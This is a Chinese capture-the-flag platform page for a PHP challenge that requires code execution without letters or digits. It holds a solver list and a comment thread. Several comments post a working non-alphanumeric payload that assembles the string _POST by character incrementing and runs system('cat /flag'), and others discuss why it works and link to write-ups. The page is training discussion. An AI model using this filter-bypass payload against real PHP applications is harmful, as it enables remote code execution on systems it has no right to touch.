评分(4)
解题动态
Goodboy 攻破了该题 1天前
z231288 攻破了该题 2天前
sirius958 攻破了该题 3天前
luobosir 攻破了该题 5天前
dwx386572657 攻破了该题 5天前
13958981937 攻破了该题 5天前
星落. 攻破了该题 5天前
asd792117174 攻破了该题 6天前
chuxinyy 攻破了该题 6天前
18585011980 攻破了该题 10天前
lvchijing 攻破了该题 12天前
bctivy99 攻破了该题 12天前
笨笨笨蛋 攻破了该题 13天前
xiaodixiaodi 攻破了该题 13天前
ctfcaiji9527 攻破了该题 17天前
c0tf 攻破了该题 20天前
xyxyxyxy 攻破了该题 20天前
店晓贰 攻破了该题 21天前
CTF-大王 攻破了该题 22天前
评论
店晓贰 21天前
举报
请教大佬各问题:为啥只能用脚本提交,BP和hackbar都不行
下辈子一定学会 1月前
举报
在控制台做的,参考了评论写的payload:$_=(_/_._)[_];$__=++$_;++$_;$__=_.$_.$__;++$_;++$_;$__.=++$_;$__.=++$_;$$__[_]($$__[__]);剩下的构造表单数据和发送 POST请求你们自己写吧
鲲中霸王 7月前
举报
code=$_=(_/_._)[_];$__=%2B%2B$_;%2B%2B$_;$__=_.$_.$__;%2B%2B$_;%2B%2B$_;$__.=%2B%2B$_;$__.=%2B%2B$_;$$__[_]($$__[__]);&_= system&__=cat /flag
lzhh530393027 7月前
举报
看懂解析了,但是再做一次也不会
jiubanyipeng 1年前
举报
脚本参考:https://www.jiubanyipeng.com/1851.html
Jiafeng 1年前
举报
我去,属于知道思路,但是不敢实践的题目;(无数子字母RCE)
小丁小丁少发神经 1年前
举报
求问为啥设计成system和cat /flag用两个参数传,为什么不可以构造出$_POST[_]然后赋值_=system(cat /flag)呢(验证一下确实不行,但是不懂为啥)
shingu 1年前
举报
我也有个疑问。我花了好几个小时去研究,但也是一知半解。目前得到的答案是:`$$_[_]` 等价于 `${$_POST['_']}`,即用 `$_POST['_']` 的值作为变量名。如果使用`_=system(cat /flag)`,PHP会尝试访问名为 `$system('cat /flag')` 的变量,这显然非法,所以行不通。
不会写代码的菜鸟 1年前
举报
这道题完全不是我能做的,有答案也看不懂
modeng 2年前
举报
以下是我的思路与总结,希望对你有所帮助https://blog.csdn.net/m_de_g/article/details/138110100?spm=1001.2014.3001.5501
Jiafeng 1年前
举报
牛逼,可以直接造出N字符,那就好搞了;
hutiaan 2年前
举报
难,为了难而难